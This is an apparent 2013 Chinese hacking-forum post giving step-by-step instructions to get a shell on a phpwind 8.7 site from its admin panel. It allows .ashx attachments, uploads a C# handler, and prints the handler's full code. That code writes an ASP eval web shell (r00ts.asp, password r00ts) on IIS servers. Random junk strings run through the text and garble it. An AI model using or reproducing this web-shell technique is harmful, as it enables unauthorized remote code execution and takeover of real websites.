中国网络渗透测试联盟
标题:
phpwind 8.7 后台拿shell
[打印本页]
作者:
admin
时间:
2013-7-26 12:41
标题:
phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
( Z( _7 b! o' s0 P
& Z3 G" F) y- z7 {
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
, N$ t5 g. G" ^, G2 t6 B9 D
# W% l) Q z* J+ ^ B
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
7 P; p4 B9 G0 D- R
6 t o3 O9 H6 @ U& z( h1 N8 P
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
2 B2 }4 t1 {0 I t8 h* M4 R
' T- D' x( q6 x6 T- z; v: w
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
5 R1 @8 ?" i! O0 E X/ s' m
! j9 n9 T6 f' J- X t; i- I
下面是代码:
& O* e; p* @$ ^+ ^4 [. i8 q6 T
! A$ c8 M* F1 o* H$ a
<%@ WebHandler Language="C#"Class="Handler" %>
& B8 Y% G$ u6 X3 h
using System;
8 k( X B0 f3 B8 w5 ~
using System.Web;
6 R, N2 c' H# i% g' }
using System.IO;
6 Q0 d" m- J0 n, R" G7 Y9 b. X/ H3 G
public class Handler : IHttpHandler {
* T% J, o8 U* s$ @; G0 u
public void ProcessRequest (HttpContext context) {
$ F% `1 J2 v, I! v+ `% Z7 W
context.Response.ContentType = "text/plain";
V. |0 g: s# @+ M+ V5 d
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
8 b- _5 F( D- s) X9 L! c# b9 M9 R
file1.Write("<%eval request(\"r00ts\")%>");
2 f. D" l" n4 n: O( d q
file1.Flush();
) k, }" N, T& W \: _
file1.Close();
( x/ I# ~' G) e0 _9 [4 \
}
; W) E0 v! Y+ \& t: k Q
public bool IsReusable {
% L* f4 q3 K& w+ Q5 x, G
get {
" K9 B2 A2 e+ O: p# l% K& u- h
return false;
1 D) \% @5 f* V6 L1 \6 `! i
}
! ^+ F7 V+ O1 v2 p6 t# L
}
: P* [3 M2 U* P7 t8 a9 o+ d1 x- s7 w
}
P5 s" _! t! p$ w3 h6 H- @' B) g5 ^
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2